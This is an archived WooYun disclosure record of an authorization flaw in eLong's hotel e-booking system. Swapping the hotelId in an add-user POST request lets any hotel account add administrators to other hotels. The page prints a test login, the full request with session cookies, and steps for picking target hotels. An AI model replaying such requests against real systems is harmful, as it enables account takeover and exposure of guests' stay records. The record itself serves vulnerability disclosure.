当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212039

漏洞标题:艺龙某站点严重漏洞可管理艺龙所有酒店/可以任意查看任意酒店开房信息(首页酒店演示)

相关厂商:艺龙旅行网

漏洞作者: 路人甲

提交时间:2016-05-23 17:08

修复时间:2016-07-07 17:50

公开时间:2016-07-07 17:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-23: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

首页任意酒店均可!!!!!打雷了

详细说明:

http://ebooking.elong.com/
wangshuai/qwer1111
登陆以后
http://ebooking.elong.com/ebkcommon/dashboard
这里
添加一个用户
然后抓包

1.jpg


2.jpg


3.jpg


POST /ebkauth/userManagement/addUserInfor HTTP/1.1
Host: ebooking.elong.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://ebooking.elong.com/ebkauth/userManagement/userInformation
Content-Length: 322
Cookie: zh_choose=n; EbkSessionId=76fa7b25cac343c8978a12f32554e86f; CookieGuid=54074839-3496-49e9-9e96-d993ce7b4a32; s_fid=245E4CC4B86BA63C-08A294CDF13BD07E; H5CookieId=fe135f4c-cbec-4b5a-a6db-a102617e8d3c; SessionToken=61567e21-3918-480b-b86b-b3deb5fdf1f3622; ShHotel=CityID=0101&CityNameCN=%E5%8C%97%E4%BA%AC%E5%B8%82&CityName=%E5%8C%97%E4%BA%AC%E5%B8%82&OutDate=2016-05-19&CityNameEN=Beijing&InDate=2016-05-18; lastRemind=1463554440038; route=cb2a03a8d3de38616d15d343e36b1cd4; JSESSIONID=39667774809875C15B9C2743EC09559C; viewIntroInfo=1
Connection: close
{"hotelStaff":{"staffName":"王帅","staffNameEn":"wangshuai9","passWord":"qwer1234","sex":"男","email":"","hotelId":"60201251","staffLevel":"1","hotelDept":"0","mobile":"131234xxxxx","singleHotelSign":1,"operator":"王帅"},"hotelUser":{"operator":"王帅","ebookingModels":"35,101,102,34,26,27,10,47,39,40,2,4,8,5,1,"}}


每个酒店hotelId对应一个酒店
http://www.elong.com/
首页任意挑选一个酒店
黄山滨江时尚主题酒店(屯溪老街店)
http://hotel.elong.com/huangshan/91097811/
91097811这个就是上面提到的hotelId
我们直接给这个酒店 添加管理用户

4.jpg


5.jpg


6.jpg


7.jpg


可能现在已经修复了

漏洞证明:

可能现在已经修复了

7.jpg

修复方案:

可能现在已经修复了

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-23 17:43

厂商回复:

尽管这个漏洞上周补天已经报过,我们正在修复中,但安全漏洞是不分平台的,仍然感谢对艺龙安全的帮助。

最新状态:

暂无